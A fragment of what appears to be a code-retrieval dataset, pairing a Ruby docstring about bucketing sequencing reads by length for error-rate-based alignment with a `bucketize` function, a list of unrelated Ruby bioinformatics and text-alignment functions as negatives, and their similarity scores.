first.ref_name)\n gags.push gag\n log.debug \"Yielding gag #{gag.inspect}\"\n yield gag if block_given?\n end\n \n return gags\n end",
"def warp_aligned\n \n align = params[:align]\n append = params[:append]\n destmap = Map.find(params[:destmap])\n\n if destmap.status.nil? or destmap.status == :unloaded or destmap.status == :loading\n flash.now[:notice] = t('.no_destination')\n redirect_to :action => \"show\", :id=> params[:destmap]\n elsif align != \"other\"\n\n if params[:align_type] == \"original\"\n destmap.align_with_original(params[:srcmap], align, append )\n else\n destmap.align_with_warped(params[:srcmap], align, append )\n end\n flash.now[:notice] = t('.success')\n redirect_to :action => \"warp\", :id => destmap.id\n else\n flash.now[:notice] = t('.unknown_alignment')\n redirect_to :action => \"align\", :id=> params[:srcmap]\n end\n end",
"def test_project_from_assembly_to_two_components\n # This chromosomal region is covered by contigs AAFC03028970, a gap and AAFC03028962\n # * Position 175000 on chr 20 is position 4030 on contig AAFC03028970\n # * Position 190000 on chr 20 is position 35 on contig AAFC03028962\n assert_equal(3, @target_slices_two_contigs.length)\n assert_equal('contig:Btau_4.0:AAFC03028970:4030:17365:1', @target_slices_two_contigs[0].display_name)\n assert_equal(Gap, @target_slices_two_contigs[1].class)\n assert_equal('contig:Btau_4.0:AAFC03028962:1:35:1', @target_slices_two_contigs[2].display_name)\n end",
"def test_compare_many\n result = @comparer.compare @first_doc, @second_doc\n\n #assert_equal result >= 0, true\n #assert_equal result <= 1, true\n\n results = Array.new(@documents.length) { Array.new(@documents.length, 0) }\n\n @dest = SheetDestination.new $test_results_dir + \"/loaded(#{@doc_count})_compare-documents(#{@compare_count}).ods\"\n\n @documents.length.times { |i|\n @documents.length.times { |j|\n puts \"comapre #{i} with #{j}\" if j % 10 == 0\n\n results[i][j] = @comparer.compare @documents[i], @documents[j]\n\n @dest.write results[i][j], i, j\n\n break if j + 1 >= @compare_count\n }\n\n break if i + 1 >= @compare_count\n }\n\n @dest.save\n dest = SheetDestination.new $test_results_dir + '/tdm.ods'\n dest.write_tdm @documents\n\n end",
"def mafft_consensus(reads, percentID)\n tmp = Tempfile.new(\"maffttmp\", @temp_path)\n reads.each.with_index(1) do |read_inf, index|\n tmp.puts \">#{read_inf.type}_#{read_inf.start_pos}_#{read_inf.end_pos}-v#{index}\"\n tmp.puts read_inf.seq.upcase\n end\n tmp.flush\n\n env = {}\n if @temp_path && !@temp_path.empty?\n env['TMPDIR'] = @temp_path\n end\n cmd = [@mafft, '--nuc', '--ep', '0.0', '--op', '1', '--genafpair', '--maxiterate', '1000', tmp.path]\n res, err, status = Open3.capture3(env, *cmd)\n unless status.success?\n STDERR.puts(\"mafft stderr:\")\n STDERR.puts(err)\n report_error(status, cmd.join(' '), [tmp]) if status.success?\n end\n tmp.close(true)\n\n # makeing a consensus seq\n align_reads = {}\n res.split(\"\\n>\").each do |align_read|\n align_read_ary = align_read.split(\"\\n\")\n if align_read_ary.last == \">\"\n if align_read_ary[0].start_with?('>')\n read_name = align_read_ary[0][1..-1]\n else\n read_name = align_read_ary[0]\n end\n align_reads[read_name] = align_read_ary[1..-2].join(\"\")\n else\n read_name = align_read_ary[0]\n align_reads[read_name] = align_read_ary[1..-1].join(\"\")\n end\n end\n\n aln = Bio::Alignment.new(align_reads.values.sort)\n align_reads_names = []\n consensus = aln.consensus_string(percentID, gap_mode: -1) # threshold =%id\n\n # tcctcgtgg---tcggctaact------------------------------------------------------- B_136582615_136582615-v90\n # tcctcgtgg---tcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n # tcctcgtgg---tcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n # tcctcgtggAGGtcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n check = Hash.new(0) # depth1の場所を探し、trimする\n align_reads.each do |read_name, align_seq|\n read_name = read_name[1..-1] if read_name.start_with?(\">\")\n align_seq.each_char.with_index{ |allele, num| check[num] += 1 if allele != \"-\" }\n align_reads_names << [align_seq, read_name]\n end\n max_num = check.keys.max\n\n new_cons = []\n if align_reads_names.size > 2 # multiple-alignmentの場合\n # tcctcgtgg---tcggctaact------------------------------------------------------- B_136582615_136582615-v90\n # ---tcgtgg---tcggctaactcctgcaaagcctgagtattctttcatttcatggtgagttttaaatt--------- B_136582615_136582615-v91\n # 最初の数文字と最後の数文字はdepth1でも消さない\n # >最初\n bef_index = -1\n flg = 0\n check.sort_by { |k, v| k }.each do |index, cnt|\n if flg == 0 and cnt == 1\n bef_index = index\n elsif flg == 1\n break\n else\n flg = 1\n end\n end\n # >最後\n aft_index = max_num + 1\n flg = 0\n check.sort_by{|k,v|k}.reverse.each do |index, cnt|\n if flg == 0 and cnt == 1\n aft_index = index\n elsif flg == 1\n break\n else\n flg = 1\n end\n end\n\n # align_reads_namesのチェック\n align_reads_names.each do |align_seq, read_name|\n new_align_seq = \"\"\n align_seq.each_char.with_index do |seq, num|\n if num <= bef_index || aft_index <= num # 最初と最後のdepth1\n new_align_seq += seq\n elsif check[num] != 1\n new_align_seq += seq\n end\n end\n end\n consensus.each_char.with_index do |seq, num|\n if num <= bef_index or aft_index <= num # 最初と最後のdepth1\n new_cons << seq\n elsif check[num] != 1\n new_cons << seq\n end\n end\n\n # pairwise-alignmentのときは特になにもせずO.K.\n else\n new_cons = [consensus]\n end\n new_cons = new_cons.join(\"\")\n\n return new_cons, reads.size\n end",
"def match_words_yandex\n eng_size= @eng_sentence.length - 1\n collision= false\n updated= false\n\n (0..eng_size).each { |eng_index|\n if !@used_eng[eng_index]\n eng_word= @eng_sentence[eng_index]\n translations= @all_translations[eng_word]\n rus_indexes= []\n translations.each do |translation|\n rus_indexes+= matches_infinitives(translation)\n end\n rus_indexes.uniq!\n if rus_indexes.size == 1\n updated= true\n @used_eng[eng_index]= true\n @used_rus[rus_indexes[0].rus_index]= true\n @translation_eng_to_rus[eng_index]= rus_indexes[0].translation\n else\n collision|= rus_indexes.size > 1\n end\n end\n }\n\n if collision && updated\n match_words_yandex\n end\n end",
"def update_alignment\n\n inital_params = {is_valid:0, step: step, km: km, kcal: kcal}\n new_align = segments.create_with(inital_params).find_or_create_by(is_valid: 0)\n\n total_valid = segments.select(\"sum(step) as step, sum(km) as km, sum(kcal) as kcal\").where(\"is_valid = 1\").first\n\n unless total_valid.step.nil?\n new_align.step = step - total_valid.step\n new_align.km = km - total_valid.km\n new_align.kcal = kcal - total_valid.kcal\n end\n\n new_align.save!(:validate => false)\n end",
"def diff(a_in, b_in)\r\n result = a_in.diff(b_in)\r\n \r\n p [a_in, b_in]\r\n \r\n # create an array of pairs of matches: [ [a,b], [a,b], ... ]\r\n sames = result[:matched_old].zip(result[:matched_new]).sort_by{|a,b| p [a,b] ; a.first }\r\n \r\n # create a null range as an endpoint\r\n sames = [ [-1...0, -1...0] ] + sames\r\n \r\n last_a, last_b = sames.last\r\n add_to_a = last_a.last < (a_in.size) ? (a_in.size...a_in.size) : nil\r\n add_to_b = last_b.last < (b_in.size) ? (b_in.size...b_in.size) : nil\r\n \r\n if add_to_a or add_to_b\r\n sames << [add_to_a, add_to_b]\r\n end\r\n \r\n a_stream = []\r\n b_stream = []\r\n \r\n puts \"sames: #{sames.inspect}\"\r\n \r\n sames.each_cons(2) do |pair_1, pair_2|\r\n a1, b1 = pair_1\r\n a2, b2 = pair_2\r\n \r\n a_gap = gap(a1, a2)\r\n b_gap = gap(b1, b2)\r\n\r\n p [:pair_1, pair_1]\r\n p [:pair_2, pair_2]\r\n p [:a_gap, a_gap]\r\n p [:b_gap, b_gap]\r\n \r\n if a_gap and !b_gap\r\n # deletion from A\r\n a_stream << [a_gap, :deleted]\r\n elsif b_gap and !a_gap\r\n # addition to B\r\n b_stream << [b_gap, :added]\r\n elsif a_gap and b_gap\r\n # change from A to B\r\n a_stream << [a_gap, :changed]\r\n b_stream << [b_gap, :changed]\r\n else\r\n # no gap!\r\n p [:no_gap]\r\n end\r\n \r\n a_stream << [a2, :same] if a_gap and a_in[a2] != \"\"\r\n b_stream << [b2, :same] if b_gap and b_in[b2] != \"\"\r\n end\r\n \r\n [a_stream, b_stream] \r\nend",
"def next_mismatch(text_base, offset)\n l = 0\n r = patt_len-offset\n\n mismatch_offset = nil\n\n while l < r\n len = (l+r)/2\n\n if match_patt?(text_base, offset, len)\n l = len+1\n else\n mismatch_offset = offset+len-1\n r = len\n end\n end\n \n if l==r && r!=len && !match_patt?(text_base, offset, r)\n mismatch_offset = offset+r-1\n end\n\n mismatch_offset\n end",
"def semi_match(guess)\n\t\t\t# removes exact matches from guess \n\t\t\tunmatched = @indices.map {|i| guess[i]}\n\t\t\t# looks at available indices in @code and removes first instance\n\t\t\t# of a number in unmatched for each match made\n\t\t\t@indices.each {\n\t\t\t\t|i| unmatched.slice!(unmatched.index(@code[i])) if unmatched.include?(@code[i]) \n\t\t\t}\n\t\t\t# returns number of correct numbers in the incorrect place\n\t\t\t@indices.length - unmatched.length\n\t\tend",
"def msa_replace_random(dir,msa_orig_file,seqs_rand_file,msa_rand_file)\n\n\n rs=PValues::RandomSequences.new\n\n\n #all files in same directory\n msa_orig = dir + msa_orig_file\n seqs_rand = dir + seqs_rand_file\n msa_rand = dir + msa_rand_file\n\n\n rs.gen_random_seqs(msa_orig,seqs_rand)\n\n parser = UqamDoc::Parsers.new\n seqs = parser.fastafile_to_fastastring(seqs_rand)\n\n #align\n maf = UqamDoc::Mafft.new #cw2=UqamDoc::ClustalW2.new\n job_id = maf.submit_dna(seqs) #job_id= cw2.submit_dna(seqs)\n #recuperate\n fasta_str = maf.get_msa_wait(job_id) #fasta_str = cw2.get_msa_wait(job_id)\n #puts fasta_str\n\n\n parser.string_to_file(fasta_str,msa_rand)\n\n\n\n\n\n\n end",
"def collaps_qnames(input_file, output_file)\n\t\n\t\tloci = {}\n\t\n\t\t# Read candidate loci and count reads/locus\n\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\tline = line.strip.split(\"\\t\")\n\t\t\tqname = line[0]\n\t\t\tbase = qname.gsub(/\\/[1,2]/, '')\n\t\t\tpos_a = line[1..3].join(':')\n\t\t\tpos_b = line[4..6].join(':')\n\t\t\tpos = [pos_a, pos_b].join(':')\n\n\t\t\talignment_length = line[-1]\n\t\n\t\t\tif !loci.has_key?(pos)\n\t\t\t\tloci[pos] = {:count => 1, :qnames => [qname], :l => alignment_length}\n\t\t\telse \n\t\t\t\tloci[pos][:qnames] << qname\n\t\t\t\tloci[pos][:count] += 1\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\tFile.open(output_file, 'w') do |output|\n\t\t\tloci.each do |pos, v| \n\t\t\t\toutput.puts [pos.split(':'), v[:count], v[:l], v[:qnames].join(';')].join(\"\\t\") if v[:count] > 0\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Collapsed anchor pairs to single loci.\"\n\tend"
] |
[
"0.62253803",
"0.58747196",
"0.5843623",
"0.5830741",
"0.5824848",
"0.5820188",
"0.58144766",
"0.5750869",
"0.5593341",
"0.55397415",
"0.5529191",
"0.54764867",
"0.54322106",
"0.5425921",
"0.54136413",
"0.5409192",
"0.5378132",
"0.53759843",
"0.53000605",
"0.5279042",
"0.5265202",
"0.5263142",
"0.5231639",
"0.52286226",
"0.5222191",
"0.520577",
"0.520379",
"0.51791376",
"0.5130634",
"0.5127823",
"0.5111462",
"0.5108104",
"0.5101365",
"0.5076029",
"0.5072557",
"0.50664544",
"0.5061593",
"0.5022581",
"0.50208837",
"0.501881",
"0.50178045",
"0.5002755",
"0.49957466",
"0.4994219",
"0.49834588",
"0.49617678",
"0.49563476",
"0.49442914",
"0.4932834",
"0.4924094",
"0.4919367",
"0.49100086",
"0.49006444",
"0.48953348",
"0.48950243",
"0.48779657",
"0.48248556",
"0.48225984",
"0.48120168",
"0.48111972",
"0.48084536",
"0.48079655",
"0.47946024",
"0.4785111",
"0.47850418",
"0.4783045",
"0.47782055",
"0.47552153",
"0.47496817",
"0.47454745",
"0.47415474",
"0.47381482",
"0.4727058",
"0.47211033",
"0.47109205",
"0.47107443",
"0.47027048",
"0.46921784",
"0.46743605",
"0.4669127",
"0.46685708",
"0.46675208",
"0.46671003",
"0.46565282",
"0.46318743",
"0.46301922",
"0.4626432",
"0.4626432",
"0.46210045",
"0.46193352",
"0.46129966",
"0.4612383",
"0.4612111",
"0.4608241",
"0.4608055",
"0.46079427",
"0.4606554",
"0.46035552",
"0.46018752",
"0.46016577"
] |
0.61717033
|
1
|
Splits reads into several files containing a read length range to allow for seperate alignments with a relative number of errors. error rate = num of errors / read length Returns array.
|
def bucketize(error_rate)
buckets = []
run_cmd(
"fastq-bucketize #{@names.get('fp')} #{error_rate} " \
"2> #{@names.get('buckets')}"
)
# parse buckets and compute corresponding absolute number of errors
File.readlines(@names.get('buckets')).each do |line|
next if line[0] == '#' # comment
line = line.split.map(&:to_i)
fail if (line[0] * error_rate).floor != (line[1] * error_rate).floor
# push [lower bound, upper bound, absolute #errors]
buckets.push([line[0], line[1], (line[0] * error_rate).floor]) \
unless line[1] < 14 # TODO: implement minlen option
end
buckets
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def array_by_40_characters \n recieve_and_read_file.scan(/.{1,40}/)\n end",
"def sub_chunks(data_offset: 0, sub_chunk_size_length: @size_length, sub_chunk_header_size: @header_size, sub_chunks_format: @chunks_format, warnings: @warnings, debug: @debug, &callback)\n data_size = self.size\n data_size > 0 ? Riffola.read(@file_name,\n offset: @offset + 4 + @size_length + @header_size + data_offset,\n chunks_format: sub_chunks_format,\n max_size: data_size - data_offset,\n parent_chunk: self,\n warnings: @warnings,\n debug: @debug,\n &callback\n ) : []\n end",
"def split_input filename, pieces\n input = {}\n name = nil\n seq=\"\"\n sequences=0\n output_files=[]\n if pieces > 1\n File.open(filename).each_line do |line|\n if line =~ /^>(.*)$/\n sequences+=1\n if name\n input[name]=seq\n seq=\"\"\n end\n name = $1\n else\n seq << line.chomp\n end\n end\n input[name]=seq\n # construct list of output file handles\n outputs=[]\n pieces = [pieces, sequences].min\n pieces.times do |n|\n outfile = \"#{filename}_chunk_#{n}.fasta\"\n outfile = File.expand_path(outfile)\n outputs[n] = File.open(\"#{outfile}\", \"w\")\n output_files[n] = \"#{outfile}\"\n end\n # write sequences\n count=0\n input.each_pair do |name, seq|\n outputs[count].write(\">#{name}\\n\")\n outputs[count].write(\"#{seq}\\n\")\n count += 1\n count %= pieces\n end\n outputs.each do |out|\n out.close\n end\n else\n output_files << filename\n end\n output_files\n end",
"def remapped_reads(input_file, output_file, read_length, mm=2)\n\t\tremapped = {}\n\t\t\n\t\t# Filter remapped reads\n\t\tinput_file.each do |line|\n\t\t\tmdz = line.match(/MD:Z:\\S*/).to_s\n\t\t\tline = line.strip.split(/\\s+/)\n\t\t\tqname, mate = line[0].split('/')\n\t\t\tpos = line[2].split(':')\n\t\t\tcigar = line[5]\n\t\n\t\t\tif !remapped.has_key?(qname) && Alignment.max_mismatches?(mdz, mm) && cigar == \"#{read_length}M\"\n\t\t\t\tremapped[qname] = [pos, mate]\n\t\t\telse\t\n\t\t\t\tremapped.delete(qname)\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\tFile.open(output_file, 'w') do |output|\n\t\t\tremapped.each {|k, v| output.puts [\"#{k}/#{v[-1]}\", v[0]].join(\"\\t\")}\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Found remapped reads.\"\n\tend",
"def split_input filename, pieces\n input = {}\n name = nil\n seq=\"\"\n sequences=0\n File.open(filename).each_line do |line|\n if line =~ /^>(.*)$/\n sequences+=1\n if name\n input[name]=seq\n seq=\"\"\n end\n name = $1\n else\n seq << line.chomp\n end\n end\n input[name]=seq\n # construct list of output file handles\n outputs=[]\n output_files=[]\n pieces = [pieces, sequences].min\n pieces.times do |n|\n outfile = File.basename(\"#{filename}_chunk_#{n}.fasta\")\n outfile = \"#{@working_dir}/#{outfile}\"\n outputs[n] = File.open(\"#{outfile}\", \"w\")\n output_files[n] = \"#{outfile}\"\n end\n # write sequences\n count=0\n input.each_pair do |name, seq|\n outputs[count].write(\">#{name}\\n\")\n outputs[count].write(\"#{seq}\\n\")\n count += 1\n count %= pieces\n end\n outputs.each do |out|\n out.close\n end\n output_files\n end",
"def reads\n (1..read_count).to_a\n end",
"def process_input_seqs! fnames\n seq_lengths = {}\n clean_fnames = []\n\n fnames.each do |fname|\n clean_fname = fname + \"_aai_clean\"\n clean_fnames << clean_fname\n File.open(clean_fname, \"w\") do |f|\n Object::ParseFasta::SeqFile.open(fname).each_record do |rec|\n unless bad_seq? rec.seq\n header =\n annotate_header clean_header(rec.header),\n File.basename(fname)\n\n seq_lengths[header] = rec.seq.length\n\n f.puts \">#{header}\\n#{rec.seq}\"\n end\n end\n end\n end\n\n [seq_lengths, clean_fnames]\n end",
"def not_test_read_head_part\r\n files_part1 = [\"9-14(15~20略).TXT\", \"33-39(21~32略).TXT\", \"40-43.txt\", \"44-47.txt\", \"48-55.TXT\",\r\n \"56-57概述结束.TXT\", \"58-59.TXT\"]\r\n files_part2 = Array.new\r\n #从60开始,到 471\r\n (60..471).to_a.each{ |i|\r\n files_part2 << i.to_s+\".TXT\"\r\n }\r\n read_from_files(files_part1 + files_part2)\r\n end",
"def read_mrp\n $MRP_FILE = $PRJ_NAME + \"_map.mrp\"\n f = open($MRP_FILE,\"r\")\n while line = f.gets\n if /ERROR/ =~ line\n /LOC=(.*)\\)/ =~ line # pick up Slice name\n $ERROR_SLICE << $1\n end\n end\n f.close\n $ERROR_SLICE.uniq!\nend",
"def read(files); end",
"def read(files); end",
"def split_data_into_files(datafile)\n\n datafiles = []\n output = NIL\n File.open(Rails.root.join(datafile)) do |file| \n counter = 0\n something_was_written = FALSE\n while line = file.gets \n # parse lines and break into different files at #\n if( line.match( /^\\s*\\#+/ ) )\n if (something_was_written && output) \n output.close\n output = NIL\n end\n something_was_written = FALSE\n else \n if (!something_was_written) \n outputfile_name = datafile.gsub(/input/,\"input\" +\n counter.to_s)\n counter +=1\n output = File.open(Rails.root.join(outputfile_name), \"w\") \n datafiles.push((Rails.root.join(outputfile_name)).to_s)\n #datafiles.push( \"../\" + outputfile_name)\n #datafiles.push(Dir.getwd + \"/\" + outputfile_name)\n end\n # check if line matches @n_nodes digits\n nodes_minus_one = (@job.nodes - 1).to_s\n if (line.match( /^\\s*(\\.?\\d+\\.?\\d*\\s+){#{nodes_minus_one}}\\.?\\d+\\.?\\d*\\s*$/ ) ) \n output.puts line\n logger.info \"write line\" + line\n something_was_written = TRUE\n else\n @error_message = \"The data you entered is invalid. This :#{line.chop!}: is not a correct line.\"\n logger.warn \"Error: Input data not correct. This :#{line}: is not a correct line.\"\n return NIL\n end\n end\n end \n file.close\n if (output) \n output.close\n end\n end\n return datafiles\n end",
"def go\n\nlines = 3 # cut it at line 3\n\nbasename = 'file_to_split.txt'\nextname = \"part\"\n\npart = 1\nline = 0\n\nfline = 0\nfor i in ifp = open(basename)\n fline = fline + 1\nend\nifp.close\n\nparts = fline / lines + 1\n\nfor i in ifp = open(basename)\n if line == 0\n ofp = open(sprintf(\"%s.%s%02d\", basename, extname, part), \"w\")\n printf(ofp, \"%s part%02d/%02d\\n\", basename, part, parts)\n ofp.write(\"BEGIN--cut here--cut here\\n\")\n end\n ofp.write(i)\n line = line + 1\n if line >= lines and !ifp.eof?\n ofp.write(\"END--cut here--cut here\\n\")\n ofp.close\n part = part + 1\n line = 0\n end\nend\nofp.write(\"END--cut here--cut here\\n\")\nofp.close\n\nifp.close\n\nend",
"def characters_in_split_arrays\n array_of_lines = recieve_and_read_file.split(\"\\n\")\n row_one = array_of_lines[0].scan(/../).to_a\n row_two = array_of_lines[1].scan(/../).to_a\n row_three = array_of_lines[2].scan(/../).to_a\n row_one.zip(row_two, row_three)\n end",
"def read_out_files(fh,number_files, unpack_35, dup_refs_gt_0)\n out_files = Array.new(number_files)\n header.num_dta_files.times do |i|\n out_files[i] = Mspire::Sequest::Srf::Out.from_io(fh, unpack_35, dup_refs_gt_0)\n end\n out_files\n end",
"def separate_digit_lines(parsed_text_file)\n parsed_text_file.each_slice(4).to_a\nend",
"def get_training_range(total_size, idx)\n num_files = (total_size * TEST_PERCENTAGE) / 100\n if (idx + num_files <= total_size)\n [idx...(idx + num_files)]\n else\n [idx...total_size, 0...num_files - (total_size - idx)]\n end\nend",
"def get_multi_line_input_int_arr(original_filename)\n get_input_str_arr(original_filename).map(&:to_i)\nend",
"def map_to_chunks(frames)\n frames.each_cons(1 + BONUS_LOOKAHEADS.max).to_a\n end",
"def read_files(year, month, path)\n array = [0, '', 100, '', 0, '', 100, 100, 100]\n month_name = Date::MONTHNAMES[month]\n link = \"#{path}_#{year}_#{month_name[0..2]}.txt\"\n file = CSV.read(link)\n loop_var, line_count = case_read_file(path, link)\n until loop_var > line_count\n high_temp_file_loop(loop_var, array, file)\n low_temp_file_loop(loop_var, array, file)\n humid_file_loop(loop_var, array, file)\n loop_var += 1\n end\n array\n end",
"def prepare_reads(base, map, fqgz0, *fqgzs0)\n\n fqgzs = [fqgz0] + fqgzs0\n\n bcs = Hash.new\n open(map, 'r').each do |line|\n bc, well = line.rstrip.split(',')\n bcs[bc] = well\n end\n \n bcl = bcs.keys.map!{|key| key.length}.sort.uniq[0]\n\n tso_pattern = '.'*options.umi_length + '.'*bcl + 'GG'\n\n #\n \n STDERR.puts \"#{`date`.strip}: Demultiplexing each raw sequence files...\"\n \n fqgz2csv0 = Hash.new\n fqgz2csv1 = Hash.new\n fqgz2base = Hash.new\n fqgzs.each do |fqgz|\n fqgz2csv0[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2csv1[fqgz] = get_temporary_path('strt.preprocess', 'csv', false)\n fqgz2base[fqgz] = get_temporary_path('strt.preprocess', 'base', false)\n end\n\n Parallel.map(fqgz2csv0.keys, in_processes: options.parallel) do |fqgz|\n cmds = [\n \"unpigz -c #{fqgz}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv0[fqgz]}\",\n \"fq1l match_5end#{grep_prefix_option(options)} #{tso_pattern}\",\n \"#{fq1l_count_command(options)} #{fqgz2csv1[fqgz]}\",\n \"fq1l annotate_index --first-cycle=#{options.umi_length+1} --last-cycle=#{options.umi_length+bcl}\",\n \"fq1l annotate_umi --first-cycle=1 --last-cycle=#{options.umi_length}\",\n \"fq1l sort_index#{coreutils_prefix_option}#{parallel_option(options)} --buffer-size=#{(options.maximum_memory/(fqgz2csv0.keys.size+1)).to_i}%\",\n \"fq1l demultiplex #{fqgz2base[fqgz]} #{map}\"\n ]\n cmds.insert(2, \"#{head_command(options)} -n #{options.reads}\") unless options.reads.nil?\n stats = Open3.pipeline(*cmds)\n stats.each_index do |i|\n raise \"Fail at process #{i}; #{stats[i]}; #{cmds[i]}\" unless stats[i].success? || (stats[i].signaled? && stats[i].termsig == 13)\n end\n end\n\n system \"fq1l sum_counts #{fqgz2csv0.values.join(' ')} > #{base}.count.step1.csv\"\n unlink_files(fqgz2csv0.values)\n \n system \"fq1l sum_counts #{fqgz2csv1.values.join(' ')} > #{base}.count.step2.csv\"\n unlink_files(fqgz2csv1.values)\n\n #\n \n (bcs.values + ['NA']).each do |well|\n\n STDERR.puts \"#{`date`.strip}: Finishing well #{well}...\"\n \n tmpfqgzs = fqgz2base.values.map {|base| \"#{base}.#{well}.fq.gz\"}\n csvs = Array.new(6) {|i| \"#{base}.#{well}.count.step#{i+3}.csv\"}\n \n pipeline(\"unpigz -c #{tmpfqgzs.join(' ')}\",\n \"#{fq1l_convert_command(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[0]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_duplicate\",\n \"#{fq1l_count_command(options)} #{csvs[1]}\",\n \"fq1l trim_3end_quality\",\n \"#{fq1l_count_command(options)} #{csvs[2]}\",\n \"fq1l trim_3end_primer#{coreutils_prefix_option}#{grep_prefix_option(options)}#{parallel_option(options)}\",\n \"#{fq1l_count_command(options)} #{csvs[3]}\",\n \"#{fq1l_sort_command} --buffer-size=#{(options.maximum_memory/2).to_i}%\",\n \"fq1l exclude_degenerate\",\n \"#{fq1l_count_command(options)} #{csvs[4]}\",\n \"fq1l trim_5end --minimum-length=#{options.minimum_length} #{tso_pattern}+\",\n \"#{fq1l_count_command(options)} #{csvs[5]}\",\n \"fq1l restore#{coreutils_prefix_option}\",\n \"pigz -c > #{base}.#{well}.fq.gz\")\n \n unlink_files(tmpfqgzs)\n \n end\n \n end",
"def file_array_parser\n @array_of_parse_files = []\n file_array.each do |file|\n File.open(\"text_files/#{file}\").readlines.each do |line|\n if line.include?(\"\\n\") # removes '\\n' (line breaker)\n @array_of_parse_files << [line.gsub!(/\\n/, '')]\n else\n @array_of_parse_files << [line]\n end \n end\n @array_of_parse_files \n end\n\nend",
"def stripe_read(striped_paths, size, offset, chunksize, read_length, ffi)\n\t\t\tstripes_count = striped_paths.count\n\t\t\t# Calculate Stripe number corresponding to offset in file\n\t\t\tchunks_till_offset_in_file = offset/chunksize\n\t\t\tstripe_at_offset = chunks_till_offset_in_file % stripes_count\n\n\t\t\tsize -= read_length\n\t\t\tread_buffer = \"\"\n\t\t\t# Calculate Offset in Stripe to read at\n\t\t\toffset_in_chunk_in_stripe = offset % chunksize\t#offset relative to a chunk \n\t\t\tchunk_till_offset_in_stripe = chunks_till_offset_in_file / stripes_count\n\t\t\toffset_in_stripe = (chunk_till_offset_in_stripe * chunksize) + offset_in_chunk_in_stripe\n\n\t\t\t# Calculate Size of data to read at offset in stripe\n\t\t\tsize_to_read_in_chunk = chunksize - offset_in_chunk_in_stripe\n\t\t\tsize_to_read_in_stripe = size > size_to_read_in_chunk ? size_to_read_in_chunk : size\n\t\t\t\n\t\t\t# Read data of calcalated size at offset in stripe\n\t\t\t::File.open(striped_paths[stripe_at_offset], \"r+\") do |file|\n\t\t\t\tfile.seek(offset_in_stripe, 0)\n\t\t\t\tread_buffer = file.read(size_to_read_in_stripe)\n\t\t\tend\n\t\t\tread_buffer\n\t\tend",
"def findSequenceFiles()\n # Assumption - 1 directory per lane\n fileList = Dir[\"*_sequence.txt\"]\n\n if fileList.size < 1\n raise \"Could not find sequence files in directory \" + Dir.pwd\n elsif fileList.size == 1\n @isFragment = true\n @sequenceFiles = fileList\n elsif fileList.size == 2\n @isFragment = false # paired end read\n @sequenceFiles = fileList\n else\n raise \"More than two sequence files detected, perhaps from different reads in directory \" + Dir.pwd\n end\n end",
"def read_lines\n lines = Array.new\n line = @file.gets\n tokens = line.scan(/[-+]?\\d*\\.?\\d+/)\n x1 = Integer(tokens[0])\n x2 = Integer(tokens[1])\n \n while not (x1==0 and x2==0)\n l = Line.new(x1,x2)\n lines.push(l)\n line = @file.gets\n tokens = line.scan(/[-+]?\\d*\\.?\\d+/)\n \n x1 = Integer(tokens[0])\n x2 = Integer(tokens[1])\n \n end\n \n return lines\n \n end",
"def read_fastq(filename)\r\n sequences = []\r\n qualities = []\r\n counter = 1 #Support variable to know what lines are needed to save\r\n current = \"seq\"\r\n File.foreach(filename) do |line|\r\n if counter % 2 == 0\r\n if current == \"seq\"\r\n sequences = sequences.concat([line.chomp])\r\n current = \"qual\"\r\n else\r\n qualities = qualities.concat([line.chomp])\r\n current = \"seq\"\r\n end\r\n end\r\n counter += 1\r\n end\r\n\r\n return [sequences, qualities]\r\nend",
"def process_build_errors(errors, error_file)\n error_count = 0\n if errors && errors.length > 0\n err_file = File.new(error_file, \"w\") if error_file\n begin\n msg, msg_num, source_line, mbr = nil, nil, nil, nil\n errors.to_s.each_line do |line|\n err_file.puts(line) if err_file\n if line =~ /^\\\\\\\\(?:Record #\\d+ - )?(.+) \\((\\d+)\\)/\n yield msg, mbr, source_line if msg && block_given?\n msg = $1\n msg_num = $2.to_i\n msg_template = DATA_LOAD_ERROR_CODES[msg_num]\n if msg_template\n re = Regexp.new(msg_template.gsub('%s', '(.+)'), Regexp::IGNORECASE)\n mbr = re.match(msg)[1]\n end\n error_count += 1\n else\n source_line = line\n yield msg, mbr, source_line if block_given?\n msg, msg_num, source_line, mbr = nil, nil, nil, nil\n end\n end\n yield msg, mbr, source_line if msg && block_given?\n ensure\n err_file.close if err_file\n end\n end\n log.warning \"There were #{error_count} build errors\" if error_count > 0\n error_count\n end",
"def makeLargeFiles(files, fileSizes)\n\t\tr = Random.new\n\t\ttotalLargeFiles = r.rand(LARGEFILES)\n\t\tlargeFiles = Array.new\n\t\tfor i in 1..totalLargeFiles\n\t\t\tfileNumber = r.rand(0..files.size-1)\n\t\t\tfile = files[fileNumber]\n\t\t\tif fileSizes[fileNumber] > 500000\n\t\t\t\t#log \"LargeFiles redo #{file}\"\n\t\t\t\tredo\n\t\t\tend\n\t\t\t#cmd = \"dd if=/dev/zero of=#{file} count=513 bs=1024 status=none\"\n\t\t\t#cmd = \"dd if=/dev/zero of=#{file} count=513 bs=1024 2&>1 >/dev/null\"\n\t\t\tcmd = \"dd if=/dev/zero of=#{file} count=513 bs=1024\"\n\t\t\t#log cmd\n\t\t\t`#{cmd} 2>&1 >/dev/null`\n\t\t\t#`#{cmd}`\n\t\t\tlargeFiles << file\n\t\t\tfileSizes[fileNumber] = 513*1024\n\t\tend\n\t\treturn largeFiles\n\tend",
"def outputs\n id_array = []\n reads.each do |read|\n id = \"s_#{self.lane}_#{read}_#{self.barcode_string}.fastq.gz\"\n id_array << id\n end\n id_array\n end",
